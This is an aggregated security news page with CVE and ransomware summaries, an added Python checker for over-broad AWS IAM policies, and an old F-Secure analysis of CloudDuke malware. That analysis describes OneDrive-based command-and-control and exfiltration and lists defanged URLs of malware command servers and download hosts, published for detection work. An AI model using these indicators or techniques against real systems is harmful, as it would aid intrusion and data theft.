Researchers at Cyata have disclosed nine previously unknown zero-day vulnerabilities in HashiCorp Vault, a widely adopted open-source secrets management platform, enabling attackers to bypass authentication, escalate privileges, and achieve remote code execution (RCE). These flaws, assigned CVEs through responsible disclosure and patched in collaboration with HashiCorp, stem from subtle logic errors in core components like […]

The post HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Federal courts to ramp up filing system security after ‘recent escalated cyberattacks’

The statement from the U.S. court system follows reports that the judiciary suffered a recent cyber breach.

The post Federal courts to ramp up filing system security after ‘recent escalated cyberattacks’ appeared first on CyberScoop.

Read More
BlackSuit, Royal ransomware group hit over 450 US victims before last month’s takedown

The Department of Homeland Security said the Russian cybercrime collective received at least $370 million in ransom payments, based on current cryptocurrency valuations.

The post BlackSuit, Royal ransomware group hit over 450 US victims before last month’s takedown appeared first on CyberScoop.

Read More
CISA, Microsoft warn organizations of high-severity Microsoft Exchange vulnerability

The public disclosure and advisories came late Wednesday during Black Hat, but Microsoft said the timing was coordinated.

The post CISA, Microsoft warn organizations of high-severity Microsoft Exchange vulnerability appeared first on CyberScoop.

Read More
Nigerian accused of hacking tax preparation businesses extradited to US

Prosecutors accuse Chukwuemeka Victor Amachukwu, who was arrested in France, of multiple fraud schemes, including tax refund fraud and identity theft.

The post Nigerian accused of hacking tax preparation businesses extradited to US appeared first on CyberScoop.

Read More
New National Cyber Director Cairncross faces challenges on policy, bureaucracy, threats

It’s a “pivotal” moment for Sean Cairncross, fresh off his Senate confirmation in a changing federal cyber landscape.

The post New National Cyber Director Cairncross faces challenges on policy, bureaucracy, threats appeared first on CyberScoop.

Read More
SonicWall firewalls hit by active mass exploitation of suspected zero-day

About 20 organizations have been impacted and the pace of attacks is rising. Threat researchers and SonicWall are scrambling to determine the root cause.

The post SonicWall firewalls hit by active mass exploitation of suspected zero-day appeared first on CyberScoop.

Read More
Why identity is the definitive cyber defense for federal agencies

As adversaries leverage AI to mimic user behavior, agencies must adopt dynamic identity architectures to verify every interaction and safeguard critical missions continuously.

The post Why identity is the definitive cyber defense for federal agencies appeared first on CyberScoop.

Read More
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed

SecurityScorecard and the Middle East Institute said in separate reports this week that Iranian hacker operations during the 12-day conflict exhibited clear strategic intent.

The post Iranian hackers were more coordinated, aligned during Israel conflict than it seemed appeared first on CyberScoop.

Read More
Google addresses six vulnerabilities in August’s Android security update

Android partners and customers have experienced a temporary respite from double-digit vulnerabilities this summer. Google issued no security patches in its update last month.

The post Google addresses six vulnerabilities in August’s Android security update appeared first on CyberScoop.

Read More
AI company Perplexity is sneaking to get around blocks on crawlers, Cloudflare alleges

Cloudflare said it received complaints from customers about Perplexity using stealthy tactics to evade network blocks against systematic browsing and scraping of web pages.

The post AI company Perplexity is sneaking to get around blocks on crawlers, Cloudflare alleges appeared first on CyberScoop.

Read More
SonicWall dismisses zero-day fears after Ransomware probe

SonicWall investigated claims that a zero-day was being used in ransomware attacks and found no evidence of a new vulnerability in its products. The investigation was launched after a surge in Akira ransomware attacks targeting Gen 7 firewalls with SSLVPN […]

Read More
Air France and KLM disclosed data breaches following the hack of a third-party platform

Air France and KLM reported a data breach after hackers gained unauthorized access to a third-party platform, potentially exposing some customers' personal information. Both airlines confirmed that threat actors accessed the platform of an unnamed service provider […]

Read More
CISA, Microsoft warn of critical Exchange hybrid flaw CVE-2025-53786

CISA and Microsoft warn of CVE-2025-53786, a high-severity flaw in Exchange hybrid deployments that lets an attacker who already has access to the on-premises Exchange server escalate privileges into the connected cloud environment. Microsoft addressed the vulnerability in Exchange Server 2016, 2019 and Subscription Edition RTM. The […]

Read More
Microsoft unveils Project Ire: AI that autonomously detects malware

Microsoft announced Project Ire, an LLM-powered autonomous system that reverse engineers software and classifies it as malicious or benign. It drives decompilers and other analysis tools, reviews their output, and determines the […]

Read More
CERT-UA warns of UAC-0099 phishing attacks targeting Ukraine’s defense sector

Ukraine's CERT-UA warns of phishing attacks by threat actor UAC-0099 targeting government and defense sectors, delivering malware families tracked as MATCHBOIL, MATCHWOK, and DRAGSTARE. The National Cyber Incident, Cyber Attack, and Cyber Threat Response Team CERT-UA investigated multiple attacks against […]

Read More
Over 100 Dell models exposed to critical ControlVault3 firmware bugs

Cisco Talos reported five vulnerabilities in Dell's ControlVault3 firmware, collectively named ReVault (tracked as CVE-2025-24311, CVE-2025-25215, CVE-2025-24922, CVE-2025-25050, and CVE-2025-24919), that expose over 100 laptop models to firmware implants and Windows login bypass by an attacker with physical […]

Read More
How CTEM Boosts Visibility and Shrinks Attack Surfaces in Hybrid and Cloud Environments

CTEM is a continuous strategy that assesses risk from an attacker’s view, helping orgs prioritize threats across cloud and hybrid environments. The attack surface has exploded. Between multi-cloud deployments, remote endpoints, SaaS platforms, shadow IT, and legacy infrastructure, the perimeter has not only become unrecognizable; in many ways, it no longer exists. For security teams, […]

Read More
WhatsApp cracks down on 6.8M scam accounts in global takedown

Meta announced that WhatsApp has removed 6.8 million accounts tied to criminal scam centers, mainly in Cambodia, in a joint effort with OpenAI. Scam centers run multiple schemes, often requiring upfront payment for fake returns. Fraudulent […]

Read More
Trend Micro fixes two actively exploited Apex One RCE flaws

Trend Micro released fixes for two critical vulnerabilities, tracked as CVE-2025-54948 and CVE-2025-54987 (CVSS score of 9.4), in the Apex One on-premises management console; both allow remote code execution through injection into the console. The vendor confirmed that both issues were actively exploited in the wild. Both […]

Read More
U.S. CISA adds D-Link cameras and Network Video Recorder flaws to its Known Exploited Vulnerabilities catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added flaws affecting D-Link cameras and a D-Link Network Video Recorder to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: According to Binding Operational Directive (BOD) 22-01: […]

Read More
Black Duck Announces Enhancements to AI Powered Application Security Assistant

Black Duck has unveiled Black Duck Assist, which enables developers to find and fix security and compliance issues in human and AI-generated code in real time. Black Duck Assist is now woven into the company’s Code Sight™ IDE plugin. These updates introduce automated scanning of AI-generated code and AI-powered remediation guidance, bringing continuous code protection […]

The post Black Duck Announces Enhancements to AI Powered Application Security Assistant appeared first on IT Security Guru.

Read More
Jen Easterly Joins Huntress Strategic Advisory Board

Jen Easterly, the former Director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), has taken up a seat on the Strategic Advisory Board of Huntress. In this new role, she will help drive the company’s innovation efforts, foster key partnerships, and support its mission to safeguard businesses of all sizes against the ever-evolving landscape […]

The post Jen Easterly Joins Huntress Strategic Advisory Board appeared first on IT Security Guru.

Read More
Surge in zero-day exploits identified in Forescout’s latest threat report

Forescout Technologies, Inc. today released its 2025H1 Threat Review, an analysis of more than 23,000 vulnerabilities and 885 threat actors across 159 countries worldwide during the first half of 2025. Among the key findings: ransomware attacks are averaging 20 incidents per day, zero-day exploits increased 46 percent, and attackers are increasingly targeting non-traditional equipment, such as […]

The post Surge in zero-day exploits identified in Forescout’s latest threat report appeared first on IT Security Guru.

Read More
Identity Security: The New Perimeter for Cloud Security Companies Using CNAPP

In a cloud-native world, your network is no longer your perimeter; identity is. Every user, workload and service account is an entry point. And every entry point has permissions. The problem? Most of those permissions are excessive, unnecessary or never revoked. In fact, according to Tenable research, more than 90% of cloud identities use […]

The post Identity Security: The New Perimeter for Cloud Security Companies Using CNAPP appeared first on IT Security Guru.
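An added example (written for this page, not Tenable's code or any CNAPP product's logic) of the kind of check that produces an "excessive permissions" finding: it walks the Allow statements of an IAM policy document and flags the usual over-broad patterns, a full or per-service action wildcard, a NotAction grant, mutating actions on Resource "*", and iam:PassRole without a role scope. The policy document is constructed to exercise each check, and the finding codes are this example's own naming.

```python
"""Flag over-broad Allow statements in an AWS IAM policy document.

Added example, not code from Tenable or from any CNAPP product. The policy
below is constructed; the checks are the common ones a permission review
starts with: full or per-service action wildcards, NotAction grants,
mutating actions on Resource "*", and iam:PassRole without a role scope.
"""
import json

# Constructed policy exercising each check (statement indexes noted).
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": "arn:aws:s3:::app-bucket/*"},                              # 0: scoped, fine
        {"Effect": "Allow", "Action": "ec2:*", "Resource": "*"},                 # 1: service wildcard on *
        {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},          # 2: pass any role
        {"Effect": "Allow", "NotAction": "iam:*", "Resource": "*"},              # 3: everything except IAM
        {"Effect": "Allow", "Action": "*", "Resource": "arn:aws:s3:::app-logs"}, # 4: admin wildcard
        {"Effect": "Allow", "Action": "ec2:DescribeInstances", "Resource": "*"}, # 5: read-only on *
        {"Effect": "Deny", "Action": "*", "Resource": "*"},                      # 6: Deny, ignored
    ],
})

READ_ONLY_PREFIXES = ("Get", "List", "Describe")


def as_list(value):
    """IAM allows a string or a list in Action/Resource/Statement; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def is_read_only(action: str) -> bool:
    """True for actions whose verb is Get/List/Describe (service:Verb form)."""
    _, _, verb = action.partition(":")
    return verb.startswith(READ_ONLY_PREFIXES)


def find_excessive(policy_doc: str) -> list[tuple[int, str, str]]:
    """Return (statement index, finding code, detail) for over-broad Allow statements."""
    findings = []
    policy = json.loads(policy_doc)
    for idx, st in enumerate(as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue
        if "NotAction" in st:
            # NotAction inverts the list: everything not named is granted.
            findings.append((idx, "not_action", f"allows everything except {st['NotAction']}"))
            continue
        actions = as_list(st.get("Action"))
        resources = as_list(st.get("Resource"))
        if "*" in actions:
            findings.append((idx, "admin_wildcard", "Action: * grants every API call"))
        else:
            for a in actions:
                if a.endswith(":*"):
                    findings.append((idx, "service_wildcard", f"{a} grants every action in the service"))
        # Read-only actions on "*" are usually acceptable; mutating ones are not.
        if "*" in resources and any(not is_read_only(a) for a in actions if a != "*"):
            findings.append((idx, "resource_wildcard", "mutating actions allowed on every resource"))
        if any(a.lower() == "iam:passrole" for a in actions) and "*" in resources:
            findings.append((idx, "passrole_any_role", "iam:PassRole should be scoped to specific role ARNs"))
    return findings


if __name__ == "__main__":
    for idx, code, detail in find_excessive(SAMPLE_POLICY):
        print(f"statement {idx}: {code}: {detail}")
```

A static pass like this only says what a policy permits; whether the permission is "unnecessary or never revoked" also needs usage data (for AWS, the service last-accessed information), which is the half that makes the finding actionable rather than merely broad.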

Read More
One Week of the Online Safety Act: Cyber Experts Weigh In

The conversation around the UK’s Online Safety Act has transformed over the past week. Since it came into force last Friday (25th July 2025), there has been a lot of public outcry, including a petition, which was signed by over 400,000 people, calling for The Act to be scrapped altogether. The UK government has since […]

The post One Week of the Online Safety Act: Cyber Experts Weigh In appeared first on IT Security Guru.

Salt Security Unveils Salt Surface to Expose Hidden API Risks

API security company Salt Security has announced the launch of Salt Surface, a new capability integrated into its existing API Protection Platform. Salt Surface provides organisations with a comprehensive API attack surface assessment, delivering an attacker’s-eye view of their public-facing APIs to uncover specific, actionable risks before they can be exploited. Salt Surface is an […]

The post Salt Security Unveils Salt Surface to Expose Hidden API Risks appeared first on IT Security Guru.

Ransomware Payment Bans: Prevention Strategy or Misguided Policy?

It’s no secret that ransomware is on the rise, as this escalation is echoed across numerous industry reports. The Verizon 2025 Data Breach Investigations Report (DBIR), for instance, starkly illustrates this reality, revealing that ransomware (with or without encryption) was present in 44% of all breaches reviewed. This marks a substantial 37% increase from their […]

The post Ransomware Payment Bans: Prevention Strategy or Misguided Policy? appeared first on IT Security Guru.

Keeper Security Releases Mobile Platform Updates for iOS and Android

Keeper Security has announced significant updates to its mobile apps for iOS and Android. The updates will bring users a smarter, smoother and more secure way to manage passwords, passkeys and sensitive data on the go. The updated Keeper mobile apps will be available in app stores soon. As smartphones become a primary point of […]

The post Keeper Security Releases Mobile Platform Updates for iOS and Android appeared first on IT Security Guru.

Saviynt Accelerates Global Expansion in Europe, Asia Pacific, Japan, and the Middle East

Identity security leader Saviynt has announced a major global expansion, opening new offices in London and Singapore, launching dedicated customer operations in Europe, and preparing for a significantly larger presence in India. The moves come amid growing demand for its AI-powered Identity Cloud platform and follow a record-breaking 2024. The expanded footprint underscores Saviynt’s ambitions […]

The post Saviynt Accelerates Global Expansion in Europe, Asia Pacific, Japan, and the Middle East appeared first on IT Security Guru.

Check Point CloudGuard WAF Expands in UK With New PoP

Check Point is accelerating its Web Application and API Protection (WAAP) expansion with the launch of new CloudGuard WAF Points of Presence (PoPs) in key strategic markets. The new instance is part of a broader CloudGuard WAF expansion, with additional launches planned in Brazil, Germany, and Taiwan in 2025. Today, the company announced the activation […]

The post Check Point CloudGuard WAF Expands in UK With New PoP appeared first on IT Security Guru.

Risk Has Moved Beyond Your Inbox

For years, email was the main security battleground. Phishing, scams, and account takeovers were problems companies knew how to fight—at least in theory. Secure email gateways, AI-driven detection, relentless user...

The post Risk Has Moved Beyond Your Inbox appeared first on Cyber Defense Magazine.

Retail Budgets at Risk: Price-Scraping and Fraudulent Bot Attacks Are on The Rise

Competition in the eCommerce industry is becoming increasingly fierce. As consumers turn to online stores, more and more retailers are making the jump themselves and pivoting towards digital. Joining such...

The post Retail Budgets at Risk: Price-Scraping and Fraudulent Bot Attacks Are on The Rise appeared first on Cyber Defense Magazine.

Effortless Cloud Security: A Beginner’s Checklist for a Safer Cloud Environment

In the past few years, the world has embraced a new era of AI, introducing an array of security tools that leverage advanced technologies to automate deployments, conduct real-time scanning,...

The post Effortless Cloud Security: A Beginner’s Checklist for a Safer Cloud Environment appeared first on Cyber Defense Magazine.

Preventing Costly Data Breaches Requires a Robust Physical and Digital Security Posture

Independent market research firm Vanson Bourne recently conducted a study querying 1,000 senior IT decision-makers across the US and EMEA regarding their organizations’ security policies for reducing and preventing data...

The post Preventing Costly Data Breaches Requires a Robust Physical and Digital Security Posture appeared first on Cyber Defense Magazine.

Post Quantum Threats – The Encryption Apocalypse That Isn’t

Preface: RSA Conference just wrapped up, and while phrases like “We are an Agentic AI solution for XYZ,” “AI in Cybersecurity,” and “Risks of AI Adoption” echoed across the expo...

The post Post Quantum Threats – The Encryption Apocalypse That Isn’t appeared first on Cyber Defense Magazine.

There Are Plenty of Phish in The Sea: Here’s How to Avoid Them

When was the last time you revisited your organization’s email security practices? Is your current software up to the task of defending your data against newer and more sophisticated cyber...

The post There Are Plenty of Phish in The Sea: Here’s How to Avoid Them appeared first on Cyber Defense Magazine.

Neural Hijacking: Is Your Brain Making Security Decisions Without You?

Introduction: The Battlefield Inside Your Head

In cybersecurity, we master firewalls and encryption. But are we neglecting the most critical vulnerability? The human brain. Every day, you make thousands of split-second...

The post Neural Hijacking: Is Your Brain Making Security Decisions Without You? appeared first on Cyber Defense Magazine.

Multifaceted Cyber-Attacks Require a Unified Defense Approach

Gone are the days of attacks hitting a single product or vulnerability. Today, we’re seeing the increasing use of multi-vector attacks and multi-stage approaches. For example, a DDoS attack in...

The post Multifaceted Cyber-Attacks Require a Unified Defense Approach appeared first on Cyber Defense Magazine.

Mind the Middle

In an era where digital threats can cripple a business overnight, where threat actors can use AI to customize and automate attacks at scale, and where enterprises face constant budget...

The post Mind the Middle appeared first on Cyber Defense Magazine.

Legacy Solutions Have Become a Cyber Defense Problem

The cyber defense community is at a crossroads that is magnified by cyber criminals’ adoption of AI and ransomware-as-a-service. With year after year of the IBM Cost of Data Breach report showing...

The post Legacy Solutions Have Become a Cyber Defense Problem appeared first on Cyber Defense Magazine.

CVE-2025-53770 & CVE-2025-53771: Critical On-Prem SharePoint Vulnerabilities

Cybereason is actively investigating exploitation attempts of these vulnerabilities. Check the Cybereason blog for additional updates.

Key Takeaways

  • Two zero-day vulnerabilities have been discovered in on-premises Microsoft SharePoint servers, tracked as CVE-2025-53770 and CVE-2025-53771.
  • Affected versions include: Subscription Edition – KB5002768, SharePoint 2019 – KB5002754, SharePoint 2016 – KB5002760.
  • If exploited, these vulnerabilities could allow remote code execution (RCE).
  • Cybereason has observed ongoing active exploitation attempts of these vulnerabilities through our Global SOC monitoring.
  • Given this exploit, we recommend taking an “assume compromised” posture, immediately patching impacted versions, and conducting a historical incident response look-back.

BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.

Deploying NetSupport RAT via WordPress & ClickFix

In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). 

Introducing the Cybereason TTP Briefing: Frontline Threat Intelligence Insights

Gain insight into the latest attack trends, techniques, and procedures our Incident Response experts are actively facing with the brand new TTP Briefing, a report built on frontline threat intelligence from our global incident response (IR) investigations, enriched by noteworthy detections from our SOC. 

Ransomware Gangs Collapse as Qilin Seizes Control

The ransomware landscape is undergoing a turbulent realignment, marked by collapses, takeovers, and unexpected internal betrayals.

Copyright Phishing Lures Leading to Rhadamanthys Stealer Now Targeting Europe

Cybereason issues Threat Alerts to inform customers of emerging impacting threats, critical vulnerabilities and attacker campaigns. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.

Genesis Market - Malicious Browser Extension

Cybereason GSOC has identified a malware infection exhibiting strong similarities to the previously reported Genesis Market malicious campaign that was dismantled by law enforcement in early 2023.

CVE-2025-32433: Unauthenticated RCE Vulnerability in Erlang/OTP’s SSH Implementation

Key Takeaways

  • A critical vulnerability has been discovered in Erlang/OTP, tracked as CVE-2025-32433, with a CVSS score of 10 (critical).
  • This critical remote code execution (RCE) vulnerability affects the SSH server within the Erlang/OTP software platform.
  • This vulnerability allows unauthenticated attackers to gain full system access by sending crafted SSH packets before any login or credentials are provided.
  • Systems running Erlang/OTP’s native SSH server are at risk; such systems may be embedded in telecom, IoT, cloud platforms, databases, etc.
  • We recommend patching impacted systems immediately.

From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets

This article is a continuation of the previous research published on the malware LummaStealer: "Your Data Is Under New Lummanagement: The Rise of LummaStealer".

A Class Above: Expert Support for Data Breach Class Action Defense

Between 2022 and 2024, data breach-related class actions in the United States surged by over 146%, with the top 10 settlements in 2024 averaging 15% higher than in 2023. As organizations grapple with increasingly aggressive litigation stemming from cybersecurity incidents, class action lawsuits have become a major risk vector—one that now rivals the breach itself in terms of financial, operational, and reputational impact, underscoring the importance of both proactive cybersecurity posture and a strong defensive strategy in litigation. Whether it’s demonstrating reasonable security practices or disputing claims of harm resulting from cybersecurity incidents, the involvement of technical experts has become critical.

How to spot a holiday shopping scam: Fake deals, trick surveys & bogus gift cards

Scammers, fraudsters, and phishers take advantage of every season. But the holiday shopping season - which includes Black Friday, Cyber Monday, and Christmas - may be their favorite.

As retailers rush to capitalize on what is generally their most profitable time of year, they will generally flood email boxes with great offers that are often time sensitive and may even seem too-good-to-be-true. Meanwhile, consumers also feel the urgency to get their shopping done, along with the stresses of work and family. Add in the financial pressure of an inflationary economy and the likelihood of making a quick mistake keeps increasing. Read on for some simple yet effective ways to ruin the scammers' fun as you celebrate the season of giving.

Soon…

Posted by Sean @ 12:52 GMT

Our "construction project" is progressing nicely.

A work in progress

And it should resolve this…

Mobile usability issues

Fix mobile usability issues?

Translation: your site doesn't help us sell more Android phones and ads.

But whatever, the "issues" should be fixed soon enough.

On 18/08/15 At 12:52 PM

Work In Progress

Posted by Sean @ 13:25 GMT

Regular readers will have noticed it's been slow here of late.

Under Construction

We're finally undertaking an upgrade from Greymatter 1.7.3. This may be the world's oldest Greymatter blog… that will now change.

More info coming soon.

In the meantime, you can still catch us on Twitter.

On 13/08/15 At 01:25 PM

"IOS Crash Report" Update: Safari Adds Block Feature

Posted by Sean @ 09:53 GMT

Ask, and sometimes, you shall receive.

Last Friday, we wrote about call center scammers targeting iOS. And today, Apple released a new (beta) feature that should help.

Apple released iOS 9 Public Beta 2:

iOS 9 Public Beta 2, Install

And it appears that one of Safari's new features allows people to block fraud-focused JavaScript.

iOS 9 Public, Safari Block Alerts

We tested a scam site, and after a few attempts to dismiss the JavaScript dialog, Safari included a prompt to "Block Alerts". We were then easily able to close the page.

Kudos Apple! Looking forward to seeing this in iOS 9's general release.

Big hat tip to Rosyna Keller.

On 23/07/15 At 09:53 AM

Duke APT group's latest tools: cloud services and Linux support

Posted by Artturi @ 11:59 GMT

Recent weeks have seen the outing of two new additions to the Duke group's toolset, SeaDuke and CloudDuke. Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python. And even more curiously, SeaDuke, with its built-in support for both Windows and Linux, is the first cross-platform malware we have observed from the Duke group. While SeaDuke is a single - albeit cross-platform - trojan, CloudDuke appears to be an entire toolset of malware components, or "solutions" as the Duke group apparently calls them. These components include a unique loader, downloader, and not one but two different trojan components. CloudDuke also greatly expands on the Duke group's usage of cloud storage services, specifically Microsoft's OneDrive, as a channel for both command and control as well as the exfiltration of stolen data. Finally, some of the recent CloudDuke spear-phishing campaigns have borne a striking resemblance to CozyDuke spear-phishing campaigns from a year ago.

Linux support added with the cross-platform SeaDuke malware

Last week, both Symantec and Palo Alto Networks published research on SeaDuke, a newer addition to the arsenal of trojans being used by the Duke group. While older malware by the Duke group has always been written with a combination of the C and C++ programming languages as well as assembly language, SeaDuke is peculiarly written in Python with multiple layers of obfuscation. This Python code is usually then compiled into Windows executables using py2exe or pyinstaller. However, the Python code itself has been designed to work on both Windows and Linux. We therefore suspect that the Duke group is also using the same SeaDuke Python code to target Linux victims. This is the first time we have seen the Duke group employ malware to target Linux platforms.

seaduke_crossplatform (39k image)
An example of the cross-platform support found in SeaDuke.

A new set of solutions with the CloudDuke malware toolset

Last week, we also saw Palo Alto Networks and Kaspersky Labs publish research on malware components they respectively called MiniDionis and CloudLook. MiniDionis and CloudLook are both components of a larger malware toolset we call CloudDuke. This toolset consists of malware components that provide varying functionality while partially relying on a shared code framework and always using the same loader. Based on PDB strings found in the samples, the malware authors refer to the CloudDuke components as "solutions" with names such as "DropperSolution", "BastionSolution" and "OneDriveSolution". A list of PDB strings we have observed is below:

  • C:\DropperSolution\Droppers\Projects\Drop_v2\Release\Drop_v2.pdb
  • c:\BastionSolution\Shells\Projects\miniDionis4\miniDionis\obj\Release\miniDionis.pdb
  • c:\BastionSolution\Shells\Projects\miniDionis2\miniDionis\obj\Release\miniDionis.pdb
  • c:\OneDriveSolution\Shells\Projects\OneDrive2\OneDrive\obj\x64\Release\OneDrive.pdb

The first of the CloudDuke components we have observed is a downloader internally called "DropperSolution". The purpose of the downloader is to download and execute additional malware on the victim's system. In most observed cases, the downloader will attempt to connect to a compromised website to download an encrypted malicious payload which the downloader will decrypt and execute. Depending on the way the downloader has been configured, in some cases it may first attempt to log in to Microsoft's cloud storage service OneDrive and retrieve the payload from there. If no payload is available from OneDrive, the downloader will revert to the previously mentioned method of downloading from compromised websites.

We have also observed two distinct trojan components in the CloudDuke toolset. The first of these, internally called "BastionSolution", is the trojan that Palo Alto Networks described in their research into "MiniDionis". Interestingly, BastionSolution appears to be functionally an exact copy of SeaDuke, with the only real difference being the choice of programming language. BastionSolution also makes significant use of a code framework that is apparently internally called "Z". This framework provides classes for functionality such as encryption, compression, randomization and network communications.

bastion_z (12k image)
A list of classes in the BastionSolution trojan, including multiple classes from the "Z" framework.

Classes from the same "Z" framework, such as the encryption and randomization classes, are also used by the second trojan component of the CloudDuke toolset. This second component, internally called "OneDriveSolution", is especially interesting because it relies on Microsoft's cloud storage service OneDrive as its command and control channel. To achieve this, OneDriveSolution will attempt to log into OneDrive with a preconfigured username and password. If successful, OneDriveSolution will then proceed to copy data from the victim's computer to the OneDrive account. It will also search the OneDrive account for files containing commands for the malware to execute.

onedrive_z (7k image)
A list of classes in the OneDriveSolution trojan, including multiple classes from the "Z" framework.

All of the CloudDuke "solutions" use the same loader, a piece of code whose primary purpose is to decrypt the embedded, encrypted solution, load it in memory and execute it. The Duke group has often employed loaders for their malware but unlike the previous loaders they have used, the CloudDuke loader is much more versatile with support for multiple methods of loading and executing the final payload as well as the ability to write to disk and execute additional malware components.

CloudDuke spear-phishing campaigns and similarities with CozyDuke

CloudDuke has recently been spread via spear-phishing emails with targets reportedly including organizations such as the US Department of Defense. These spear-phishing emails have contained links to compromised websites hosting zip archives that contain CloudDuke-laden executables. In most cases, executing these executables will have resulted in two additional files being written to the victim's hard disk. The first of these files has been a decoy, such as an audio file or a PDF file, while the second one has been a CloudDuke loader embedding a CloudDuke downloader, the so-called "DropperSolution". In these cases, the victim has been presented with the decoy file while in the background the downloader has proceeded to download and execute one of the CloudDuke trojans, "OneDriveSolution" or "BastionSolution".

decoy_ndi_small (63k image)
Example of one of the decoy documents employed in the CloudDuke spear-phishing campaigns. It has apparently been copied by the attackers from here.

Interestingly, however, some of the other CloudDuke spear-phishing campaigns we have observed this July have borne a striking resemblance to CozyDuke spear-phishing campaigns seen almost exactly a year ago, in the beginning of July 2014. In both spear-phishing campaigns, the decoy document has been the exact same PDF file, a "US letter fax test page" (28d29c702fdf3c16f27b33f3e32687dd82185e8b). Similarly, the URLs hosting the malicious files have, in both campaigns, purported to be related to eFaxes. It is also interesting to note that in the case of the CozyDuke-inspired CloudDuke spear-phishing campaign, the downloading and execution of the malicious archive linked to in the emails has not resulted in the execution of the CloudDuke downloader but in the execution of the "BastionSolution" component, thereby skipping one step from the process described for the other CloudDuke spear-phishing campaigns.

decoy_fax (72k image)
The "US letter fax test page" decoy employed in both CloudDuke and CozyDuke spear-phishing campaigns.

Increasingly using cloud services to evade detection

CloudDuke is not the first time we have observed the Duke group use cloud services in general, and Microsoft OneDrive specifically, as part of their operations. Earlier this spring we released research on CozyDuke, where we mentioned observing CozyDuke sometimes either directly use a OneDrive account to exfiltrate stolen data or, alternatively, download Visual Basic scripts that would copy stolen files to a OneDrive account and sometimes even retrieve files containing additional commands from the same OneDrive account.

In these previous cases the Duke group has only used OneDrive as a secondary communication channel but still relied on more traditional C&C channels for most of their actions. It is therefore interesting to note that CloudDuke actually enables the Duke group to rely solely on OneDrive for every step of their operation from downloading the actual trojan, passing commands to the trojan and finally exfiltrating stolen data.

By relying solely on third-party web services, such as OneDrive, as their command and control channel, we believe the Duke group is trying to better evade detection. Large amounts of data being transferred from an organization's network to an unknown web server easily raises suspicions. However, data being transferred to a popular cloud storage service is normal. What better way for an attacker to surreptitiously transfer large amounts of stolen data than the same way people are transferring that same data every day for legitimate reasons? (Coincidentally, the implications of third-party web services being used as command and control channels are also the subject of an upcoming talk at the VirusBulletin 2015 conference.)

Directing limited resources towards evading detection and staying ahead of defenders

Developing even a single multipurpose malware toolset, never mind many, requires time and resources. Therefore it seems logical to attempt to reuse code, such as supporting frameworks, between different toolsets. The Duke group, however, appear to have taken this a step further with SeaDuke and the CloudDuke component BastionSolution, by rewriting the same code in multiple programming languages. This has the obvious benefit of saving time and resources while providing two malware toolsets that, while similar on the inside, appear completely different on the outside. This way, the discovery of one toolset does not immediately lead to the discovery of the second toolset.

The Duke group, long suspected of ties to the Russian state, have been running their espionage operation for an unusually long time and - especially lately - with unusual brazenness. These latest CloudDuke and SeaDuke campaigns appear to be a clear sign that the Dukes are not planning to stop any time soon.

Research and post by Artturi (@lehtior2)

F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B

Samples:


Compromised servers used for command and control:

hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://58.80.109.59/plugins/search.php

Compromised websites used to host CloudDuke:

hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP

On 22/07/15 At 11:59 AM

'Zero Days', The Documentary

Posted by Mikko @ 12:40 GMT

VPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.

The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.

On 20/07/15 At 12:40 PM

IOS Crash Report: Blocking "Pop-Ups" Doesn't Really Help

Posted by Sean @ 10:15 GMT

The Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:

"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."

Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…

First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.

A Google Search returns several live scam sites with this text:

"Due to a third party application in your phone, IOS is crashed."

Here's one of the sites as viewed with iOS Safari on an iPad:

iosclean.com

Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.

What looks like a pop-up in the image above is actually a JavaScript-generated dialog, one which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.

Here's the same site as viewed with Google Chrome for Windows:

Prevent this page from creating additional dialogs

Notice the additional text in the image above: "prevent this page from creating additional dialogs". Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)

